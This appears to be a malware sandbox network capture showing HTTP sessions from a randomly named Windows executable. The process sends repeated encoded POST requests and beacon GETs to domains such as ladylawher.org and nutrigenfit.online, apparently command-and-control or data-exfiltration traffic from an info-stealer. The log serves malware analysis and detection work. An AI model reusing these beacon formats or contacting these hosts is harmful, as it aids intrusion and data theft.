                                                                                                                                            Data Raw: 31 34 42 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
                                                                                                                                            Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>newhopetoday.app is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=p
                                                                                                                                            Oct 22, 2024 13:28:03.816804886 CEST212INData Raw: 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62
                                                                                                                                            Data Ascii: arked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>newhopetoday.app</h1><h2>is a totally awesome ide
                                                                                                                                            Oct 22, 2024 13:28:03.816817045 CEST1236INData Raw: 61 20 73 74 69 6c 6c 20 62 65 69 6e 67 20 77 6f 72 6b 65 64 20 6f 6e 2e 3c 2f 68 32 3e 0a 3c 70 20 63 6c 61 73 73 3d 27 62 69 67 27 3e 43 68 65 63 6b 20 62 61 63 6b 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 27
                                                                                                                                            Data Ascii: a still being worked on.</h2><p class='big'>Check back later.</p><form action='https://www.hover.com/domains/results' method='get'><input name='source' type='hidden' value='parked'><input name='q' placeholder='Find a domain for your own g
                                                                                                                                            Oct 22, 2024 13:28:03.816829920 CEST1236INData Raw: 72 2e 63 6f 6d 2f 74 6f 6f 6c 73 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 59 6f 75 72 20 41 63 63 6f 75 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6e 61 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 27 73 6f 63 69 61 6c 27 3e
                                                                                                                                            Data Ascii: r.com/tools?source=parked">Your Account</a></li></ul></nav><nav class='social'><ul><li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" />
                                                                                                                                            Oct 22, 2024 13:28:03.816842079 CEST1236INData Raw: 39 37 37 34 37 20 31 35 2e 36 35 33 33 32 2c 32 39 2e 32 38 37 31 36 20 2d 35 2e 37 36 37 37 33 2c 2d 30 2e 31 38 32 36 35 20 2d 31 31 2e 31 39 33 33 31 2c 2d 31 2e 37 36 35 36 35 20 2d 31 35 2e 39 33 37 31 36 2c 2d 34 2e 34 30 30 38 33 20 2d 30
                                                                                                                                            Data Ascii: 97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-
                                                                                                                                            Oct 22, 2024 13:28:03.816857100 CEST636INData Raw: 30 33 74 2d 33 20 2d 39 36 2e 35 74 30 20 2d 31 30 35 2e 35 74 30 2e 35 20 2d 37 36 2e 35 74 2d 30 2e 35 20 2d 37 36 2e 35 74 30 20 2d 31 30 35 2e 35 74 33 20 2d 39 36 2e 35 74 31 30 20 2d 31 30 33 74 31 38 2e 35 20 2d 37 31 2e 35 71 32 30 20 2d
                                                                                                                                            Data Ascii: 03t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t96.5 -3t105.5 0t76.5 0.5 t76.5 -0.5t105.5 0t96.5 3t103 10t71.5 18.5q50 20 88 58t58 88q11 29 18.5 71.5t10 103t3 96.5t0
                                                                                                                                            Oct 22, 2024 13:28:03.816867113 CEST694INData Raw: 0d 0a 32 41 38 0d 0a 61 76 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 32 34 20 48 6f 76 65 72 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68
                                                                                                                                            Data Ascii: 2A8av><ul><li>Copyright &copy; 2024 Hover</li><li><a rel="nofollow" href="https://www.hover.com/tos?source=parked">Terms of Service</a></li><li><a rel="nofollow" href="https://www.hover.com/privacy?source=parked">Privacy</a></li></ul>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.5499823.33.130.19080764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:08.922418118 CEST691OUTPOST /tcwz/ HTTP/1.1
                                                                                                                                            Host: www.ladylawher.org
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 207
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.ladylawher.org
                                                                                                                                            Referer: http://www.ladylawher.org/tcwz/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 61 37 30 6c 4b 6f 58 52 4e 4d 2b 64 6b 77 57 55 36 75 72 31 77 6a 2f 70 6e 6f 4f 59 70 6b 72 59 73 34 41 4a 65 55 68 53 48 52 77 77 4f 4e 2b 51 77 63 4a 77 46 64 45 71 46 4b 43 75 36 6d 6b 78 4f 36 71 69 31 33 55 34 72 42 4a 37 6f 68 72 44 33 67 49 30 4d 47 4e 73 7a 52 2f 71 31 6c 51 2f 32 47 6d 56 55 6a 53 59 78 2f 58 41 62 6f 43 54 59 77 6b 4a 65 33 62 72 78 6c 4e 43 76 2b 4a 67 46 39 62 52 52 64 35 54 6b 2f 57 6b 46 77 43 4c 7a 36 4f 62 48 76 4c 4a 70 6a 4b 33 5a 2f 78 79 73 2f 38 53 73 32 36 31 55 55 39 48 38 4a 65 63 66 30 72 47 31 6e 64 59 33 6d 42 43 52 2f 35 64 4a 30 43 56 61 69 34 3d
                                                                                                                                            Data Ascii: -v4puN=a70lKoXRNM+dkwWU6ur1wj/pnoOYpkrYs4AJeUhSHRwwON+QwcJwFdEqFKCu6mkxO6qi13U4rBJ7ohrD3gI0MGNszR/q1lQ/2GmVUjSYx/XAboCTYwkJe3brxlNCv+JgF9bRRd5Tk/WkFwCLz6ObHvLJpjK3Z/xys/8Ss261UU9H8Jecf0rG1ndY3mBCR/5dJ0CVai4=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.5499833.33.130.19080764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:11.899844885 CEST711OUTPOST /tcwz/ HTTP/1.1
                                                                                                                                            Host: www.ladylawher.org
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 227
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.ladylawher.org
                                                                                                                                            Referer: http://www.ladylawher.org/tcwz/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 61 37 30 6c 4b 6f 58 52 4e 4d 2b 64 69 6a 4f 55 35 4a 66 31 79 44 2f 6d 6a 59 4f 59 38 55 72 63 73 34 4d 4a 65 51 35 38 48 6a 55 77 4f 70 75 51 78 65 68 77 4c 39 45 71 4e 71 43 76 30 47 6b 75 4f 36 6e 52 31 33 6f 34 72 42 64 37 6f 67 62 44 32 58 63 37 4f 57 4e 71 37 78 2f 6f 32 56 51 2f 32 47 6d 56 55 69 32 32 78 37 44 41 62 59 79 54 43 56 49 49 51 58 62 71 35 46 4e 43 34 75 4a 6b 46 39 61 32 52 59 5a 35 6b 37 6d 6b 46 31 6d 4c 32 34 32 59 4d 76 4c 48 33 54 4c 42 61 50 34 73 72 4d 45 51 6c 6b 76 47 50 69 4d 37 30 66 76 32 46 57 6a 75 6d 48 78 67 6e 31 4a 31 41 50 59 30 54 58 53 6c 45 31 74 55 6a 44 56 56 37 6e 33 70 44 7a 66 43 47 4e 79 76 71 4c 7a 52
                                                                                                                                            Data Ascii: -v4puN=a70lKoXRNM+dijOU5Jf1yD/mjYOY8Urcs4MJeQ58HjUwOpuQxehwL9EqNqCv0GkuO6nR13o4rBd7ogbD2Xc7OWNq7x/o2VQ/2GmVUi22x7DAbYyTCVIIQXbq5FNC4uJkF9a2RYZ5k7mkF1mL242YMvLH3TLBaP4srMEQlkvGPiM70fv2FWjumHxgn1J1APY0TXSlE1tUjDVV7n3pDzfCGNyvqLzR


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.5499843.33.130.19080764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:14.451106071 CEST1728OUTPOST /tcwz/ HTTP/1.1
                                                                                                                                            Host: www.ladylawher.org
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 1243
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.ladylawher.org
                                                                                                                                            Referer: http://www.ladylawher.org/tcwz/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 61 37 30 6c 4b 6f 58 52 4e 4d 2b 64 69 6a 4f 55 35 4a 66 31 79 44 2f 6d 6a 59 4f 59 38 55 72 63 73 34 4d 4a 65 51 35 38 48 6a 63 77 4f 37 6d 51 77 34 70 77 49 39 45 71 44 4b 43 69 30 47 6c 79 4f 35 57 35 31 33 6c 46 72 44 6c 37 79 47 48 44 78 6a 77 37 45 57 4e 71 33 52 2f 70 31 6c 51 75 32 47 32 52 55 69 6d 32 78 37 44 41 62 61 71 54 4d 51 6b 49 41 6e 62 72 78 6c 4e 47 76 2b 4a 63 46 39 44 4a 52 59 74 44 6b 6f 75 6b 46 54 47 4c 30 74 61 59 51 2f 4c 46 32 54 4c 4a 61 50 6b 4e 72 4d 49 36 6c 6c 62 73 50 6c 67 37 6b 65 32 73 59 43 72 70 6b 32 4e 37 30 30 52 4b 56 4b 6b 46 56 32 53 52 4c 79 5a 6d 2f 51 39 72 37 42 44 6b 41 33 47 53 53 37 2b 38 6e 4e 48 65 49 6b 6d 43 77 32 78 7a 47 52 34 41 38 32 55 4f 53 30 37 4f 35 39 51 57 34 4c 57 45 76 37 57 36 5a 4b 58 66 53 77 42 77 32 53 37 46 32 4e 31 45 33 7a 45 74 6d 4b 49 6e 6e 71 2f 78 79 49 48 63 6e 65 62 48 55 61 46 6d 67 51 4b 47 39 78 37 76 6e 4c 4d 34 53 7a 6b 38 50 36 75 31 78 69 62 42 5a 48 71 2b 46 66 69 68 62 32 6e 45 2f 38 6c [TRUNCATED]
                                                                                                                                            Data Ascii: -v4puN=a70lKoXRNM+dijOU5Jf1yD/mjYOY8Urcs4MJeQ58HjcwO7mQw4pwI9EqDKCi0GlyO5W513lFrDl7yGHDxjw7EWNq3R/p1lQu2G2RUim2x7DAbaqTMQkIAnbrxlNGv+JcF9DJRYtDkoukFTGL0taYQ/LF2TLJaPkNrMI6llbsPlg7ke2sYCrpk2N700RKVKkFV2SRLyZm/Q9r7BDkA3GSS7+8nNHeIkmCw2xzGR4A82UOS07O59QW4LWEv7W6ZKXfSwBw2S7F2N1E3zEtmKInnq/xyIHcnebHUaFmgQKG9x7vnLM4Szk8P6u1xibBZHq+Ffihb2nE/8lUWtij+bC0zEqO57IlinlvH5GIqIsYeekvq+Lhus63u4FCwLFVnh+NVRLj05R+HTmatclL9hlgaEMQUm3J4QHUxYU8wL/9wf1LSQwDdsUdY1Qv8LBnSLzIeVev9Lra0nRFCnVN9Et2LSfU060KKg93gVVrAEKqV207d0Jq2DG7dniBU6QDvoOTxZrk9RwfivTCh7z/uDwd78JTC5PxBmQubLNGMYWxXT0YwzqFjfvzwyjX2kiJOdFcU0sQWs61VERHsmh29CQLkd4hvKwXTHq1jEN58HNoF1cDlHweMp0WSDaaIyRCI/57iHuXGZRX3I4TpaxZX//BFix68RCnge0mgdaF3oItQfraKE4EMe32UAStVA8I1GCGvX/ZC18MP16jZhQeX3VsL4llZXXLoP7LVhBLblwXifEL2AMaO4OF/U1DrAyhxeEX3SOI7teOGZxIuDR9Qp+T5pXH5yLL2R5mSkKcS27a8zKuallH/9aFCdL4+c66Rsidz0n4mlEiAaSsKu8N06zH+9XDr7h4JyBrkPOd2PMbdJ0a9bawWgZSGwLC5GJVY34O69oQpfO8PxobrJvqArNPv6LXTJwAL+Ux24URpjRUAX/JDSdPWmE1PNnIFCDeGwJMTAInA+gQTudh75yHItZDnFQb1v9u7MaUMyMnKbGt/ci/D [TRUNCATED]


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            8192.168.2.5499853.33.130.19080764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:16.994504929 CEST432OUTGET /tcwz/?vd=fhUlwfGxBn-tt&-v4puN=X5cFJf7HFuS/xVOc5sSh+Hrfp4eRpmHBiZNITnwuLXQtfpi955BzQ8MtI/Oo5RgXSpSv2VRHuXNT9Azn4jxaM1RW1Sv60yoj6GSBXC/EsqLKRI7QEkNRexaswW0RsPsQQg== HTTP/1.1
                                                                                                                                            Host: www.ladylawher.org
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Oct 22, 2024 13:28:17.622266054 CEST411INHTTP/1.1 200 OK
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Tue, 22 Oct 2024 11:28:17 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 271
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 64 3d 66 68 55 6c 77 66 47 78 42 6e 2d 74 74 26 2d 76 34 70 75 4e 3d 58 35 63 46 4a 66 37 48 46 75 53 2f 78 56 4f 63 35 73 53 68 2b 48 72 66 70 34 65 52 70 6d 48 42 69 5a 4e 49 54 6e 77 75 4c 58 51 74 66 70 69 39 35 35 42 7a 51 38 4d 74 49 2f 4f 6f 35 52 67 58 53 70 53 76 32 56 52 48 75 58 4e 54 39 41 7a 6e 34 6a 78 61 4d 31 52 57 31 53 76 36 30 79 6f 6a 36 47 53 42 58 43 2f 45 73 71 4c 4b 52 49 37 51 45 6b 4e 52 65 78 61 73 77 57 30 52 73 50 73 51 51 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vd=fhUlwfGxBn-tt&-v4puN=X5cFJf7HFuS/xVOc5sSh+Hrfp4eRpmHBiZNITnwuLXQtfpi955BzQ8MtI/Oo5RgXSpSv2VRHuXNT9Azn4jxaM1RW1Sv60yoj6GSBXC/EsqLKRI7QEkNRexaswW0RsPsQQg=="}</script></head></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            9192.168.2.549986195.110.124.13380764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:22.723154068 CEST703OUTPOST /8gyb/ HTTP/1.1
                                                                                                                                            Host: www.nutrigenfit.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 207
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.nutrigenfit.online
                                                                                                                                            Referer: http://www.nutrigenfit.online/8gyb/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 6c 46 6a 75 50 7a 7a 66 6a 7a 77 56 47 52 6d 30 55 54 37 5a 36 78 30 36 67 33 67 4f 55 66 57 69 59 55 43 59 7a 75 6b 30 79 6c 64 52 57 55 52 76 69 65 34 61 37 48 42 44 70 46 69 33 50 7a 55 73 73 69 6e 36 46 47 78 79 61 57 74 44 44 63 47 65 45 4e 52 35 32 45 34 71 32 52 57 59 59 73 38 65 6a 44 49 54 79 34 6b 50 73 4e 78 58 34 62 49 38 6e 57 64 35 56 73 33 7a 52 77 63 37 59 69 34 69 42 48 58 62 77 68 5a 56 34 74 52 50 51 62 64 73 4c 33 62 68 70 6d 56 4f 75 54 56 72 59 4c 6c 6d 31 76 30 6e 68 35 78 6d 35 6c 50 34 78 4c 73 39 4a 75 74 31 63 42 5a 4c 35 2f 66 72 39 6f 4f 58 2f 5a 52 66 6d 70 67 3d
                                                                                                                                            Data Ascii: -v4puN=lFjuPzzfjzwVGRm0UT7Z6x06g3gOUfWiYUCYzuk0yldRWURvie4a7HBDpFi3PzUssin6FGxyaWtDDcGeENR52E4q2RWYYs8ejDITy4kPsNxX4bI8nWd5Vs3zRwc7Yi4iBHXbwhZV4tRPQbdsL3bhpmVOuTVrYLlm1v0nh5xm5lP4xLs9Jut1cBZL5/fr9oOX/ZRfmpg=
                                                                                                                                            Oct 22, 2024 13:28:23.548450947 CEST367INHTTP/1.1 404 Not Found
                                                                                                                                            Date: Tue, 22 Oct 2024 11:28:23 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            Content-Length: 203
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 38 67 79 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            10192.168.2.549987195.110.124.13380764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:25.265639067 CEST723OUTPOST /8gyb/ HTTP/1.1
                                                                                                                                            Host: www.nutrigenfit.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 227
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.nutrigenfit.online
                                                                                                                                            Referer: http://www.nutrigenfit.online/8gyb/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 6c 46 6a 75 50 7a 7a 66 6a 7a 77 56 47 78 57 30 56 77 54 5a 76 68 30 39 73 58 67 4f 4e 76 57 6d 59 55 2b 59 7a 72 42 76 78 54 6c 52 54 48 46 76 6a 66 34 61 2b 48 42 44 6d 6c 6a 39 53 6a 56 42 73 69 72 45 46 44 4a 79 61 53 4e 44 44 5a 36 65 45 65 70 34 33 55 34 73 39 78 57 61 57 4d 38 65 6a 44 49 54 79 34 77 6c 73 4e 35 58 34 71 59 38 6d 30 31 34 63 4d 33 77 48 67 63 37 50 79 34 6d 42 48 57 30 77 6b 6b 79 34 72 64 50 51 61 74 73 49 6a 50 67 6e 6d 56 55 6a 7a 55 39 59 6f 34 38 7a 70 42 79 70 49 49 34 6d 6b 50 68 77 39 64 58 54 4d 6c 64 50 68 31 7a 70 73 58 63 73 59 76 2b 6c 36 42 76 34 2b 33 72 51 64 4f 55 68 4b 4d 42 70 77 49 57 41 2f 4a 34 71 68 54 4b
                                                                                                                                            Data Ascii: -v4puN=lFjuPzzfjzwVGxW0VwTZvh09sXgONvWmYU+YzrBvxTlRTHFvjf4a+HBDmlj9SjVBsirEFDJyaSNDDZ6eEep43U4s9xWaWM8ejDITy4wlsN5X4qY8m014cM3wHgc7Py4mBHW0wkky4rdPQatsIjPgnmVUjzU9Yo48zpBypII4mkPhw9dXTMldPh1zpsXcsYv+l6Bv4+3rQdOUhKMBpwIWA/J4qhTK
                                                                                                                                            Oct 22, 2024 13:28:26.106281042 CEST367INHTTP/1.1 404 Not Found
                                                                                                                                            Date: Tue, 22 Oct 2024 11:28:25 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            Content-Length: 203
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 38 67 79 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            11192.168.2.549988195.110.124.13380764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:27.812515020 CEST1740OUTPOST /8gyb/ HTTP/1.1
                                                                                                                                            Host: www.nutrigenfit.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 1243
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.nutrigenfit.online
                                                                                                                                            Referer: http://www.nutrigenfit.online/8gyb/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
